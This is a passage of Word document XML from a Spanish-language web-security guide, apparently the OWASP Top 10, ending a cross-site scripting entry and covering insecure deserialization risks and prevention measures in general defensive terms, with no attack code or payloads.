          <w:p w:rsidR="00912EEA" w:rsidRPr="00AD15D0" w:rsidRDefault="00912EEA" w:rsidP="00AD15D0">
            <w:pPr>
              <w:spacing w:after="200"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:color w:val="FF0000"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AD15D0">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Este ataque causa que el identificador de sesión de la víctima sea enviado al sitio web del atacante, permitiéndole secuestrar la sesión actual del usuario.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00912EEA" w:rsidRPr="00912EEA" w:rsidRDefault="00912EEA" w:rsidP="00BA6B7F">
            <w:pPr>
              <w:spacing w:after="200"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00912EEA" w:rsidRPr="00912EEA" w:rsidTr="00296F9B">
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="12180" w:type="dxa"/>
            <w:gridSpan w:val="4"/>
          </w:tcPr>
          <w:p w:rsidR="00912EEA" w:rsidRPr="00912EEA" w:rsidRDefault="00912EEA" w:rsidP="00BA6B7F">
            <w:pPr>
              <w:spacing w:after="200"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00912EEA">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:noProof/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:drawing>
                <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251700224" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="42B55824" wp14:editId="42034275">
                  <wp:simplePos x="0" y="0"/>
                  <wp:positionH relativeFrom="column">
                    <wp:posOffset>-65197</wp:posOffset>
                  </wp:positionH>
                  <wp:positionV relativeFrom="paragraph">
                    <wp:posOffset>0</wp:posOffset>
                  </wp:positionV>
                  <wp:extent cx="1257475" cy="800212"/>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44F0F8.tmp"/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId88">
                            <a:extLst>
                              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                              </a:ext>
                            </a:extLst>
                          </a:blip>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="1257475" cy="800212"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                  <wp14:sizeRelH relativeFrom="page">
                    <wp14:pctWidth>0</wp14:pctWidth>
                  </wp14:sizeRelH>
                  <wp14:sizeRelV relativeFrom="page">
                    <wp14:pctHeight>0</wp14:pctHeight>
                  </wp14:sizeRelV>
                </wp:anchor>
              </w:drawing>
            </w:r>
            <w:r w:rsidRPr="00912EEA">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Deserialización Insegura</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00912EEA" w:rsidRPr="00912EEA" w:rsidTr="00296F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0" w:type="dxa"/>
            <w:gridSpan w:val="4"/>
          </w:tcPr>
          <w:p w:rsidR="00912EEA" w:rsidRPr="00CB3A13" w:rsidRDefault="00912EEA" w:rsidP="00CB3A13">
            <w:pPr>
              <w:spacing w:after="200"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CB3A13">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Estos defectos ocurren cuando una aplicación recibe objetos serializados dañinos y estos objetos pueden ser manipulados o borrados por el atacante para realizar ataques de repetición, inyecciones o elevar sus privilegios de ejecución. En el peor de los casos, la deserialización insegura puede conducir a la ejecución remota de código en el servidor.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00912EEA" w:rsidRPr="00912EEA" w:rsidTr="00296F9B">
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="12180" w:type="dxa"/>
            <w:gridSpan w:val="4"/>
          </w:tcPr>
          <w:p w:rsidR="00912EEA" w:rsidRPr="00912EEA" w:rsidRDefault="008C0FAE" w:rsidP="00BA6B7F">
            <w:pPr>
              <w:spacing w:after="200"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00912EEA">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:noProof/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:drawing>
                <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251701248" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="12196A22" wp14:editId="740955D7">
                  <wp:simplePos x="0" y="0"/>
                  <wp:positionH relativeFrom="column">
                    <wp:posOffset>-69215</wp:posOffset>
                  </wp:positionH>
                  <wp:positionV relativeFrom="paragraph">
                    <wp:posOffset>-480728</wp:posOffset>
                  </wp:positionV>
                  <wp:extent cx="8253350" cy="846455"/>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44EA0A.tmp"/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId89">
                            <a:extLst>
                              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                              </a:ext>
                            </a:extLst>
                          </a:blip>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="8253350" cy="846455"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                  <wp14:sizeRelH relativeFrom="page">
                    <wp14:pctWidth>0</wp14:pctWidth>
                  </wp14:sizeRelH>
                  <wp14:sizeRelV relativeFrom="page">
                    <wp14:pctHeight>0</wp14:pctHeight>
                  </wp14:sizeRelV>
                </wp:anchor>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00167841" w:rsidRPr="00912EEA" w:rsidTr="00296F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rsidR="00912EEA" w:rsidRPr="008C0FAE" w:rsidRDefault="00912EEA" w:rsidP="00066586">
            <w:pPr>
              <w:spacing w:after="200"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="008C0FAE">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Lograr la explotación de deserialización es difícil, ya que los </w:t>
            </w:r>
            <w:r w:rsidRPr="008C0FAE">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>exploits distribuidos raramente funcionan sin cambios o ajustes en su código fuente</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4961" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
          </w:tcPr>
          <w:p w:rsidR="00912EEA" w:rsidRPr="00912EEA" w:rsidRDefault="00912EEA" w:rsidP="00066586">
            <w:pPr>
              <w:spacing w:after="200"/>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00912EEA">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t xml:space="preserve">Algunas herramientas pueden descubrir defectos de deserialización, pero con </w:t>
            </w:r>
            <w:r w:rsidRPr="00912EEA">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t xml:space="preserve">frecuencia se necesita ayuda humana para validarlo. </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00912EEA" w:rsidRPr="00912EEA" w:rsidRDefault="00912EEA" w:rsidP="00066586">
            <w:pPr>
              <w:spacing w:after="200"/>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00912EEA">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Se espera que los datos de prevalencia de estos errores aumenten a medida que se desarrollen más herramientas para ayudar a identificarlos y abordarlos.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3680" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00912EEA" w:rsidRPr="00912EEA" w:rsidRDefault="00912EEA" w:rsidP="00066586">
            <w:pPr>
              <w:spacing w:after="200"/>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00912EEA">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t xml:space="preserve">No se debe desvalorizar el impacto de los errores de deserialización. </w:t>
            </w:r>
            <w:r w:rsidRPr="00912EEA">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t xml:space="preserve">Pueden llevar a la ejecución remota de código, uno de los ataques más serios posibles. </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00912EEA" w:rsidRPr="00912EEA" w:rsidRDefault="00912EEA" w:rsidP="00066586">
            <w:pPr>
              <w:spacing w:after="200"/>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00912EEA">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>El impacto al negocio depende de las necesidades de la aplicación y de los datos.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00912EEA" w:rsidRPr="00912EEA" w:rsidTr="00296F9B">
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="6091" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
          </w:tcPr>
          <w:p w:rsidR="00912EEA" w:rsidRPr="00912EEA" w:rsidRDefault="00912EEA" w:rsidP="00BA6B7F">
            <w:pPr>
              <w:spacing w:after="200"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00912EEA">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>¿La aplicación es vulnerable?</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00912EEA" w:rsidRPr="0080715E" w:rsidRDefault="00912EEA" w:rsidP="0080715E">
            <w:pPr>
              <w:spacing w:after="200"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0080715E">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Aplicaciones y APIs serán vulnerables si deserializan objetos hostiles o manipulados por un atacante. </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00912EEA" w:rsidRPr="0080715E" w:rsidRDefault="00912EEA" w:rsidP="0080715E">
            <w:pPr>
              <w:spacing w:after="200"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0080715E">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Esto da como resultado dos tipos primarios de ataques:</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00912EEA" w:rsidRPr="0080715E" w:rsidRDefault="00912EEA" w:rsidP="0080715E">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="11"/>
              </w:numPr>
              <w:spacing w:after="200"/>
              <w:contextualSpacing/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0080715E">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Ataques relacionados con la estructura de datos y objetos; donde el atacante modifica la lógica de la aplicación o logra una ejecución remota de código que puede cambiar el comportamiento de la aplicación durante o después de la deserialización. </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00912EEA" w:rsidRPr="0080715E" w:rsidRDefault="00912EEA" w:rsidP="0080715E">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="11"/>
              </w:numPr>
              <w:spacing w:after="200"/>
              <w:contextualSpacing/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0080715E">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Ataques típicos de manipulación de datos; como ataques relacionados con el control de acceso, en los </w:t>
            </w:r>
            <w:r w:rsidRPr="0080715E">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>que se utilizan estructuras de datos existentes pero se modifica su contenido.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00912EEA" w:rsidRPr="0080715E" w:rsidRDefault="00912EEA" w:rsidP="0080715E">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="6"/>
              </w:numPr>
              <w:spacing w:after="200"/>
              <w:ind w:left="171" w:firstLine="0"/>
              <w:contextualSpacing/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0080715E">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>La serialización puede ser utilizada en aplicaciones para:</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00912EEA" w:rsidRPr="0080715E" w:rsidRDefault="00912EEA" w:rsidP="0080715E">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="11"/>
              </w:numPr>
              <w:spacing w:after="200"/>
              <w:contextualSpacing/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0080715E">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Comunicación remota e Inter-Procesos (RPC/IPC) </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00912EEA" w:rsidRPr="0080715E" w:rsidRDefault="00912EEA" w:rsidP="0080715E">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="11"/>
              </w:numPr>
              <w:spacing w:after="200"/>
              <w:contextualSpacing/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0080715E">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Protocolo de comunicaciones, Web Services y Brokers de mensajes. </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00912EEA" w:rsidRPr="0080715E" w:rsidRDefault="00912EEA" w:rsidP="0080715E">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="11"/>
              </w:numPr>
              <w:spacing w:after="200"/>
              <w:contextualSpacing/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0080715E">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Caching y Persistencia </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00912EEA" w:rsidRPr="00912EEA" w:rsidRDefault="00912EEA" w:rsidP="0080715E">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="11"/>
              </w:numPr>
              <w:spacing w:after="200"/>
              <w:contextualSpacing/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0080715E">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Bases de datos, servidores de caché y sistemas de archivos.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6089" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
          </w:tcPr>
          <w:p w:rsidR="00912EEA" w:rsidRPr="00912EEA" w:rsidRDefault="00912EEA" w:rsidP="00BA6B7F">
            <w:pPr>
              <w:spacing w:after="200"/>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00912EEA">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Plan de contingencia</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00912EEA" w:rsidRPr="00912EEA" w:rsidRDefault="00912EEA" w:rsidP="0080715E">
            <w:pPr>
              <w:spacing w:after="200"/>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00912EEA">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">El único patrón de arquitectura seguro es no aceptar objetos serializados de fuentes no confiables o utilizar medios de serialización que sólo permitan tipos de datos primitivos. </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00912EEA" w:rsidRPr="00912EEA" w:rsidRDefault="00912EEA" w:rsidP="0080715E">
            <w:pPr>
              <w:spacing w:after="200"/>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00912EEA">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Si esto no es posible, considere alguno de los siguientes puntos:</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00912EEA" w:rsidRPr="00912EEA" w:rsidRDefault="00912EEA" w:rsidP="0080715E">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="12"/>
              </w:numPr>
              <w:spacing w:after="200"/>
              <w:contextualSpacing/>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00912EEA">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Implemente verificaciones de integridad tales como firmas digitales en cualquier objeto serializado, con el fin de detectar modificaciones no autorizadas. </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00912EEA" w:rsidRPr="00912EEA" w:rsidRDefault="00912EEA" w:rsidP="0080715E">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="12"/>
              </w:numPr>
              <w:spacing w:after="200"/>
              <w:contextualSpacing/>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00912EEA">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Durante la deserialización y antes de la creación del objeto, exija el cumplimiento estricto de </w:t>
            </w:r>
            <w:r w:rsidRPr="00912EEA">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t xml:space="preserve">verificaciones de tipo de dato, ya que el código normalmente espera un conjunto de clases definibles. Se ha demostrado que se puede pasar por alto esta técnica, por lo que no es aconsejable confiar sólo en ella. </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00912EEA" w:rsidRPr="00912EEA" w:rsidRDefault="00912EEA" w:rsidP="0080715E">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="12"/>
              </w:numPr>
              <w:spacing w:after="200"/>
              <w:contextualSpacing/>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00912EEA">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Aísle el código que realiza la deserialización, de modo que se ejecute en un entorno con los mínimos privilegios posibles. • Registre las excepciones y fallas en la deserialización, tales como cuando el tipo recibido no es el esperado, o la deserialización produce algún tipo de error.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00912EEA" w:rsidRPr="00912EEA" w:rsidRDefault="00912EEA" w:rsidP="0080715E">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="12"/>
              </w:numPr>
              <w:spacing w:after="200"/>
              <w:contextualSpacing/>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00912EEA">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Restrinja y monitoree las conexiones (I/O) de red desde contenedores o servidores que utilizan funcionalidades de deserialización. </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00912EEA" w:rsidRPr="00912EEA" w:rsidRDefault="00912EEA" w:rsidP="0080715E">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="12"/>
              </w:numPr>
              <w:spacing w:after="200"/>
              <w:contextualSpacing/>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
